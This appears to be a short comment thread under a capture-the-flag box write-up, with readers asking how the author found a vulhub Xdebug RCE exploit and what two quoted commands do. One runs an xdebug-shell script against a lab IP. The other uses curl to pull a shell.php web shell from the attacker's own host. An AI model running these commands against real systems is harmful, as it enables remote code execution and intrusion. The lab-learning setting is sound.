Great post. When I was doing the box I never thought to use Nikto and it took me quite a while to notice that first foothold!
Lesson learned, thanks.
Thank you very much for your writeups.
May I ask you 2 questions:
I wonder what keywords in Google you used to find this github.com link:
vulhub/php/xdebug-rce at master · vulhub/vulhub · GitHub
I tried these keywords in Google without success.
xdebug exploit shell
xdebug exploit rce
xdebug exploit repository
xdebug php exploit
…Question 2 has 2 sub questions:
You wrote in your writeup:
./xdebug-shell.py -u http://10.10.10.83
curl -O http://miIp/shell.php
…Is this “xdebug-shell.py” the code copied from
the IP address of my Kali Linux?
Thanks a million.
I guess the keywords to search on Google were:
php debug rce